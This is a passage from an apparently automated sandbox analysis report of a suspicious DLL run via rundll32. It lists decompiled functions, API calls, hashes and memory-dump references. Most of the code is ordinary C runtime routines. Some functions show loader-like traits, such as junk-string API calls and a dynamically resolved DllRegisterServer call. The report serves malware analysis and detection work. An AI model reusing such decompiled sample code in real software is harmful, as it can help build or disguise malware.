                                                                                                              • Part of subcall function 10023FE8: __mtinitlocknum.LIBCMT ref: 10023FFC
                                                                                                              • Part of subcall function 10023FE8: __amsg_exit.LIBCMT ref: 10024008
                                                                                                              • Part of subcall function 10023FE8: EnterCriticalSection.KERNEL32(00000001,00000001,?,10025F0B,0000000D,10041560,00000008,10025FFD,00000001,?,?,00000001,?,?,1002092A,00000001), ref: 10024010
                                                                                                            • ___sbh_find_block.LIBCMT ref: 1001F71D
                                                                                                            • ___sbh_free_block.LIBCMT ref: 1001F72C
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,10041288,0000000C,10025E61,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001), ref: 1001F75C
                                                                                                            • GetLastError.KERNEL32(?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001,00000001,?,10025F0B,0000000D,10041560), ref: 1001F76D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714421763-0
                                                                                                            • Opcode ID: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
                                                                                                            • Instruction ID: dcea96c0beb71c26c32ed6edefd011e4960108453953efdd22255c92b90fc265
                                                                                                            • Opcode Fuzzy Hash: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
                                                                                                            • Instruction Fuzzy Hash: 3E01A235809311EAEB21EBB0AD4A75E3BA4DF05364F51421CF500EE0E1CB34D9C0CA55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034C48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 207 10034c48-10034cd9 GetCurrencyFormatW * 2
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10034C48() {
				signed int _t1;
				intOrPtr _t6;
				short* _t7;
				short* _t10;

				_t10 = L"xadqsavcbdfewescGADW";
				_t7 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t1 = GetCurrencyFormatW(0, 0x11d4, _t7, 0, _t10, 0x22b9); // executed
				 *0x10046a90 = _t1 *  *0x100440dc + 1;
				 *0x10046a94 = 8;
				 *0x10046a98 = 2;
				 *0x10046a9c = 4;
				_t6 = GetCurrencyFormatW(0, 0x11d4, _t7, 0, _t10, 0x22b9) *  *0x100440cc + 0x10;
				 *0x10046aa0 = _t6;
				 *0x10046aa4 = 0x80;
				 *0x10046aa8 = 0x20;
				 *0x10046aac = 0x40;
				return _t6;
			}







                                                                                                            0x10034c57
                                                                                                            0x10034c5f
                                                                                                            0x10034c6d
                                                                                                            0x10034c83
                                                                                                            0x10034c88
                                                                                                            0x10034c92
                                                                                                            0x10034c9c
                                                                                                            0x10034cb1
                                                                                                            0x10034cb5
                                                                                                            0x10034cba
                                                                                                            0x10034cc4
                                                                                                            0x10034cce
                                                                                                            0x10034cd9

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10034C6D
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10034CA6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 81c4f9537eb770243fdc0a32d7e47a3285133bc035b71f969f81bf8c0384ebd2
                                                                                                            • Instruction ID: 5c52f8c4d727126c86f77c33851e7c0b5fa0ee0d1993fb30478bf6546009c500
                                                                                                            • Opcode Fuzzy Hash: 81c4f9537eb770243fdc0a32d7e47a3285133bc035b71f969f81bf8c0384ebd2
                                                                                                            • Instruction Fuzzy Hash: 94F01DF1140625EEF3008B85CEC6F433BA8E34B718F11800AE344EB6D1D7B614688F6A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000373C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 208 1000373c-10003743 209 10003745-10003746 ExitProcess 208->209 210 1000374c-10003758 call 10003122 208->210 213 1000375b-1000375d 210->213
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000373C() {
				int _t1;

				_t1 =  *0x10046a8c; // 0x8ffe10
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				 *((intOrPtr*)(E10003122(_t1, "DllRegisterServer")))(); // executed
				return 0;
			}




                                                                                                            0x1000373c
                                                                                                            0x10003743
                                                                                                            0x10003746
                                                                                                            0x10003746
                                                                                                            0x10003759
                                                                                                            0x1000375d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID: DllRegisterServer
                                                                                                            • API String ID: 621844428-1663957109
                                                                                                            • Opcode ID: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
                                                                                                            • Instruction ID: 5b79a9f3272a285f0bc727d2d6f4db5e8a7be798465fbb40fb281ab7da0c5106
                                                                                                            • Opcode Fuzzy Hash: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
                                                                                                            • Instruction Fuzzy Hash: A4C08CF22082016BF602EBB08C8880B238CEB08292311C808F000D7005EF39E4000A00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024B73 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 214 10024b73-10024b91 HeapCreate 215 10024b93-10024b95 214->215 216 10024b96-10024ba3 call 10024b18 214->216 219 10024ba5-10024bb2 call 10024019 216->219 220 10024bc9-10024bcc 216->220 219->220 223 10024bb4-10024bc7 HeapDestroy 219->223 223->215
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024B73(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10048aa4 = _t6;
				if(_t6 != 0) {
					_t7 = E10024B18(__eflags);
					__eflags = _t7 - 3;
					 *0x1004a564 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E10024019(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10048aa4);
							 *0x10048aa4 =  *0x10048aa4 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                            0x10024b84
                                                                                                            0x10024b8c
                                                                                                            0x10024b91
                                                                                                            0x10024b96
                                                                                                            0x10024b9b
                                                                                                            0x10024b9e
                                                                                                            0x10024ba3
                                                                                                            0x10024bc9
                                                                                                            0x10024bcb
                                                                                                            0x10024bcc
                                                                                                            0x10024ba5
                                                                                                            0x10024baa
                                                                                                            0x10024baf
                                                                                                            0x10024bb2
                                                                                                            0x00000000
                                                                                                            0x10024bb4
                                                                                                            0x10024bba
                                                                                                            0x10024bc0
                                                                                                            0x00000000
                                                                                                            0x10024bc0
                                                                                                            0x10024bb2
                                                                                                            0x10024b93
                                                                                                            0x10024b93
                                                                                                            0x10024b95
                                                                                                            0x10024b95

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000,100207AC,00000001,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C), ref: 10024B84
                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10024BBA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3296620671-0
                                                                                                            • Opcode ID: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
                                                                                                            • Instruction ID: 7ecfd6e5781d3b6a0fc92bf663133c7527b62661b4374eaf376562758425141b
                                                                                                            • Opcode Fuzzy Hash: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
                                                                                                            • Instruction Fuzzy Hash: 26E02230A123129EF786CB30AF8671A33F4EB06382F424836F004C98A0FFB0C140DA05
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100036FA Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 224 100036fa-10003708 call 1001f631 227 1000370a 224->227 228 1000370b-10003719 224->228 229 10003727-10003728 call 1001f6f4 228->229 230 1000371b-10003725 228->230 232 1000372d-1000373b 229->232 230->229 230->230
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E100036FA(void* __ebx, void* __esi, void* __eflags) {
				void* _t2;
				signed int _t7;
				char _t9;
				signed int _t12;
				void* _t14;
				void* _t15;
				signed int _t17;

				_t2 = E1001F631(__ebx, _t14, _t15, __esi,  *0x100440e4);
				if(_t2 != 0) {
					_t12 =  *0x100440e4; // 0x0
					_push(__ebx);
					_t9 = 0;
					__eflags = _t12;
					_push(__esi);
					_t17 = _t12;
					if(__eflags > 0) {
						do {
							 *((char*)(_t9 + _t2)) = _t9;
							_t9 = _t9 + 1;
							__eflags = _t9 -  *0x100440e4; // 0x0
						} while (__eflags < 0);
					}
					_push(_t2); // executed
					E1001F6F4(_t9, _t15, _t17, __eflags); // executed
					asm("sbb eax, eax");
					_t7 =  ~(_t9 - _t17) & 0x00000003;
					__eflags = _t7;
					return _t7;
				} else {
					return _t2;
				}
			}










                                                                                                            0x10003700
                                                                                                            0x10003708
                                                                                                            0x1000370b
                                                                                                            0x10003711
                                                                                                            0x10003712
                                                                                                            0x10003714
                                                                                                            0x10003716
                                                                                                            0x10003717
                                                                                                            0x10003719
                                                                                                            0x1000371b
                                                                                                            0x1000371b
                                                                                                            0x1000371e
                                                                                                            0x1000371f
                                                                                                            0x1000371f
                                                                                                            0x1000371b
                                                                                                            0x10003727
                                                                                                            0x10003728
                                                                                                            0x10003734
                                                                                                            0x10003737
                                                                                                            0x10003737
                                                                                                            0x1000373b
                                                                                                            0x1000370a
                                                                                                            0x1000370a
                                                                                                            0x1000370a

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 10003700
                                                                                                              • Part of subcall function 1001F631: __FF_MSGBANNER.LIBCMT ref: 1001F654
                                                                                                              • Part of subcall function 1001F631: __NMSG_WRITE.LIBCMT ref: 1001F65B
                                                                                                              • Part of subcall function 1001F631: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001), ref: 1001F6A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 501242067-0
                                                                                                            • Opcode ID: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
                                                                                                            • Instruction ID: adc5ccbd96ec724cefc73a2f5283e4f6b1af06d455631b59cbb6fed6ff4e13e7
                                                                                                            • Opcode Fuzzy Hash: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
                                                                                                            • Instruction Fuzzy Hash: 53E086BA2141A24AFF19DAF89EE68562748D7110913228A7EE646C6556DA20E8208250
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10020E42 Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 233 10020e42-10020e48 call 10020d63 235 10020e4d-10020e50 233->235
                                                                                                            C-Code - Quality: 25%
                                                                                                            			E10020E42() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10020D63(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                                                                            0x10020e42
                                                                                                            0x10020e44
                                                                                                            0x10020e46
                                                                                                            0x10020e48
                                                                                                            0x10020e50

                                                                                                            APIs
                                                                                                            • _doexit.LIBCMT ref: 10020E48
                                                                                                              • Part of subcall function 10020D63: __lock.LIBCMT ref: 10020D71
                                                                                                              • Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DA0
                                                                                                              • Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DAD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __decode_pointer$__lock_doexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 3276244213-0
                                                                                                            • Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                            • Instruction ID: ebb22d002e4bc0be4ce9b3835a93604f57b833b8c7c0406f906832a81f765660
                                                                                                            • Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                            • Instruction Fuzzy Hash: 0CA00279BD530062F871D1903CD3F5421065750F01FD40051BB182C1C2A5C732584057
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000302D Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 236 1000302d-10003043 VirtualAlloc
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000302D(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}




                                                                                                            0x1000303d
                                                                                                            0x10003043

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 1000303D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
                                                                                                            • Instruction ID: 5d0982da9e6573c30bbcbca7a50cfe3a5b7972743b959b5c0e66da410622836f
                                                                                                            • Opcode Fuzzy Hash: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
                                                                                                            • Instruction Fuzzy Hash: 1CB00832418792EBDF02DF90CD4482ABAA2BB89301F184C5CF6A151570D7228468EF07
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003044 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 237 10003044-10003056 VirtualFree
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10003044(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}




                                                                                                            0x10003050
                                                                                                            0x10003056

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNELBASE(?,?,?), ref: 10003050
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
                                                                                                            • Instruction ID: 115bf12ed0fa7589b407f79f41f639b3f7b4823b02c2866c4b7f4f1f1b5172d7
                                                                                                            • Opcode Fuzzy Hash: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
                                                                                                            • Instruction Fuzzy Hash: 43B00235408610FFDF025F50DD4480ABBA2BB89321F10D958F1AA51430D7329420EF07
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 10011C86 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E10011C86(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x10045580; // 0x6a53a566
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1001FBC4(E10033C93, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E10004E6E(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E1000424F(_t98 - 0x10, E1001044F());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E10011ABC(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
